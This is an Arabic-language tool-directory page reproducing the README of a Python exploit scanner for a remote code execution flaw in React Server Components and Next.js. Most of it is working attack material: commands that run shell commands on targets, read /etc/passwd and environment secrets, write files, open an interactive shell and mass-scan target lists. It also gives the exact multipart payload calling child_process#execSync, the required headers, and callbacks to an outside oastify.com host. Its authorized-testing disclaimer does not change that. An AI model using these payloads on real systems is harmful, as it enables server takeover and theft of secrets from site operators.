Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-Exploit-PoC-Scanner — ماسح استغلال مبني على بايثون لـ CVE-2025-55182 و CVE-2025-66478 في مكونات خادم React. يتضمن تنفيذ تعليمات برمجية عن بعد (RCE) متعدد الأدوات، تحقق خارج النطاق (OOB)، مسح مجمع، وقشرة تفاعلية لاختبار الاختراق المصرح به. | Kitploit
أدوات/GitHubGitHub/zemarkhos/cve-2025-55182-exploit-poc-scanner
ماسحات الثغرات الأمنيةالتحليل الديناميكي (عزل)الاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
تطوير الحمولات
GitHubzemarkhos/cve-2025-55182-exploit-poc-scanner

CVE-2025-55182-Exploit-PoC-Scanner

ماسح استغلال مبني على بايثون لـ CVE-2025-55182 و CVE-2025-66478 في مكونات خادم React. يتضمن تنفيذ تعليمات برمجية عن بعد (RCE) متعدد الأدوات، تحقق خارج النطاق (OOB)، مسح مجمع، وقشرة تفاعلية لاختبار الاختراق المصرح به.

عرض المستودع
21منذ 8 أشهرلم تتم المراجعة بعد

CVE-2025-55182 - أداة استغلال تنفيذ الأكواد عن بُعد لمكونات خادم React الإصدار 2.0

أداة بحث أمنية شاملة لاختبار الثغرات CVE-2025-55182 و CVE-2025-66478 في مكونات خادم React (RSC) وإجراءات خادم Next.js.

نظرة عامة على الثغرة

الخاصيةالقيمة
معرفات CVECVE-2025-55182, CVE-2025-66478
درجة CVSS10.0 (حرجة)
الإصدارات المتأثرةReact < 19.2.0، Next.js < 15.0.5
نوع الثغرةتنفيذ الأكواد عن بُعد (RCE)
متجه الهجومالشبكة

الميزات

  • مسح للثغرات بأسلوب PortSwigger مع حمولات كشف متعددة
  • أدوات استغلال RCE متعددة (execSync، spawnSync، vm.runInThisContext، إلخ)
  • اختبار استدعاء خارج النطاق (OOB) للتحقق من RCE الأعمى
  • إمكانية قراءة/كتابة الملفات
  • تنفيذ أكواد JavaScript
  • وضع شل تفاعلي
  • مسح جماعي مع تعدد الخيوط
  • دعم الوكيل (متوافق مع Burp Suite)
  • تنسيقات إخراج JSON/نصي

التثبيت

المتطلبات

root@kitploit:~
pip install requests

إصدار Python

  • Python 3.7 أو أعلى

بدء سريع

root@kitploit:~
# فحص أساسي للثغرة
python3 exploit-custom.py -u https://target.com --check

# فحص شامل للثغرة (موصى به)
python3 exploit-custom.py -u https://target.com --scan

# مع وكيل (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080

# اختبار استدعاء خارج النطاق (OOB)
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com

# تنفيذ أمر
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# شل تفاعلي
python3 exploit-custom.py -u https://target.com --shell

الاستخدام

وسائط سطر الأوامر

root@kitploit:~
usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
                         [-H HEADER] [-t THREADS] [--timeout TIMEOUT]
                         [--check] [--detect] [--scan] [--test-all]
                         [--oob HOST] [--cmd CMD] [--gadget GADGET]
                         [--read FILE] [--write FILE CONTENT] [--js JS]
                         [--shell] [-o OUTPUT] [-q]

اختيار الهدف

الوسيطةالوصفمثال
-u, --urlرابط هدف واحد-u https://target.com
-l, --listملف يحتوي على روابط-l targets.txt

أوضاع المسح

الوسيطةالوصف
--detectكشف استخدام Next.js/RSC
--checkفحص سريع للثغرة (اختبار رياضي)

الاستغلال

خيارات الاتصال

خيارات الإخراج

الوسيطةالوصف
-o, --outputحفظ النتائج في ملف (.json أو .txt)
-q, --quietإخفاء الشعار

أمثلة المسح

هدف واحد

root@kitploit:~
# كشف Next.js و RSC
python3 exploit-custom.py -u https://target.com --detect

# فحص سريع للثغرة
python3 exploit-custom.py -u https://target.com --check

# فحص شامل مع جميع حمولات الكشف
python3 exploit-custom.py -u https://target.com --scan

# اختبار جميع الأدوات مع التحقق عبر OOB
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com

المسح الجماعي

root@kitploit:~
# مسح أهداف متعددة
python3 exploit-custom.py -l targets.txt --scan -o results.json

# مع زيادة الخيوط
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json

# مع استدعاءات OOB
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json

أمثلة الاستغلال

تنفيذ الأوامر

root@kitploit:~
# باستخدام الأداة الافتراضية (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# باستخدام أداة محددة
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync

عمليات الملفات

root@kitploit:~
# قراءة ملف
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ

# كتابة ملف
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"

تنفيذ JavaScript

root@kitploit:~
# الحصول على متغيرات البيئة
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"

# الحصول على اسم المضيف
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"

# سرد الدليل
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"

شل تفاعلي

root@kitploit:~
python3 exploit-custom.py -u https://target.com --shell

أوامر الشل:

الأدوات المتاحة

أدوات RCE

أدوات الملفات

الاسممعرف الوحدةالوصف
fs_readFileSyncfs#readFileSyncقراءة الملفات التعسفية
fs_writeFileSyncfs#writeFileSyncكتابة الملفات التعسفية

أدوات OOB

الاسمالوصف
vm_fetchطلب HTTP عبر واجهة fetch (Node 18+)
vm_httpطلب HTTP عبر وحدة http

حمولات الكشف (CVE-2025-66478)

يستخدم وضع --scan حمولات الكشف بأسلوب PortSwigger التالية:

طرق استدعاء OOB

تدعم الأداة عدة طرق لاستدعاء OOB:

تفسير الإخراج

ألوان الطرفية

نتائج المسح

root@kitploit:~
[VULN] property_reference          تم كشف نمط ثغرة!
        -> نمط الملخص: E{"digest"... (يحتاج تحقق OOB)
[SAFE] property_reference_v2       HTTP 200
[500]  action_ref_vm               digest:12345

تفاصيل تقنية

تنسيق رحلة RSC

تقوم الأداة بتحليل استجابات "تنسيق الرحلة" لمكونات خادم React:

root@kitploit:~
0:{"a":"$@1","b":"$@2"}
1:E{"digest":"12345"}

هيكل الحمولة متعددة الأجزاء

root@kitploit:~
------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"

------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"child_process#execSync","bound":["whoami"]}
------CVE2025Boundary--

رؤوس HTTP المطلوبة

root@kitploit:~
Content-Type: multipart/form-data; boundary=----CVE2025Boundary
Accept: text/x-component
Next-Action: <random-uuid>
RSC: 1
Next-Router-State-Tree: [[["",{"children":["__PAGE__",{}]},null,null,true]]

الإصدارات المصححة

React

  • 19.0.1, 19.1.2, 19.2.1

Next.js

  • 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

حالات الاستخدام

مكافآت الثغرات

root@kitploit:~
# 1. إعداد قائمة الأهداف
echo "https://app.example.com" > targets.txt
echo "https://api.example.com" >> targets.txt

# 2. مسح جماعي
python3 exploit-custom.py -l targets.txt --scan -o results.json

# 3. تحقق باستخدام OOB
python3 exploit-custom.py -u https://vuln.example.com --oob your-id.oastify.com

اختبار الاختراق

root@kitploit:~
# 1. كشف التقنية
python3 exploit-custom.py -u https://target.com --detect

# 2. تحليل باستخدام Burp
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080

# 3. استغلال
python3 exploit-custom.py -u https://target.com --shell

المراجع

  • تنبيه أمان Next.js - CVE-2025-66478
  • بحث Wiz - CVE-2025-55182
  • بحث PortSwigger

إخلاء المسؤولية القانوني

تم توفير هذه الأداة لأغراض اختبار الأمن المصرح به والتعليم فقط.

تحذير: الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدم هذه الأداة فقط على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها.

المؤلفون غير مسؤولين عن أي استخدام خاطئ أو ضرر ناتج عن هذه الأداة.

الترخيص

تم إصدار هذه الأداة لأغراض البحث الأمني واختبار الاختراق المصرح به.


المؤلف: Ünsal Furkan Harani الإصدار: 2.0

تنزيل الأداة
--scan
فحص شامل للثغرة (بأسلوب PortSwigger)
--test-allاختبار جميع الأدوات وحمولات الكشف
الوسيطةالوصفمثال
--cmdتنفيذ أمر شل--cmd "id"
--gadgetتحديد الأداة المستخدمة--gadget execSync
--readقراءة ملف من الهدف--read /etc/passwd
--writeكتابة ملف إلى الهدف--write /tmp/test.txt "content"
--jsتنفيذ كود JavaScript--js "process.env"
--shellبدء شل تفاعلي--shell
--oobمضيف استدعاء خارج النطاق--oob xyz.oastify.com
الوسيطةالوصفمثال
-p, --proxyوكيل HTTP/HTTPS-p http://127.0.0.1:8080
-c, --cookiesسلسلة ملفات تعريف الارتباط-c "session=abc123"
-H, --headerرأس إضافي (قابل للتكرار)-H "X-Custom: value"
-t, --threadsعدد الخيوط للمسح الجماعي-t 20
--timeoutمهلة الطلب بالثواني--timeout 60
الأمرالوصف
<command>تنفيذ أمر شل
!read <file>قراءة ملف
!write <file> <content>كتابة ملف
!js <code>تنفيذ JavaScript
!gadget <name>تبديل الأداة
exitالخروج من الشل
الاسممعرف الوحدةالوصف
execSyncchild_process#execSyncتنفيذ أمر شل مباشر
execFileSyncchild_process#execFileSyncتنفيذ ملف ثنائي
spawnSyncchild_process#spawnSyncتشغيل عملية مع وسائط
vm_runInThisContextvm#runInThisContextتنفيذ JS في السياق الحالي
vm_runInNewContextvm#runInNewContextتنفيذ JS مع الهروب من الصندوق الرملي
vm_runInThisContext_globalvm#runInThisContextتنفيذ عبر global.process
الحمولةالوصف
property_referenceمرجع خاصية مفصول بنقطتين ["$1:a:a"]
property_reference_v2مرجع بديل ["$1:b:b"]
property_reference_constructorالوصول إلى المنشئ عبر مرجع خاصية
property_reference_protoالوصول إلى سلسلة النموذج الأولي عبر مرجع خاصية
action_ref_vmACTION_REF مع vm#runInThisContext
action_ref_execSyncACTION_REF مع child_process#execSync
الطريقةالوصف
curlطلب HTTP عبر أمر curl
wgetطلب HTTP عبر أمر wget
nslookupاستعلام DNS
pingاختبار الاتصال ICMP
fetchواجهة fetch في Node.js
httpوحدة http في Node.js
اللونالحالةالمعنى
أخضر[VULN]ثغرة - تم تأكيد RCE
أصفر[PATCH]تم التصحيح - إجراءات الخادم نشطة ولكن محمية
أزرق[RSC]تم كشف إجراءات الخادم
سماوي[NEXT]تم كشف Next.js
أحمر[ERR]خطأ في الاتصال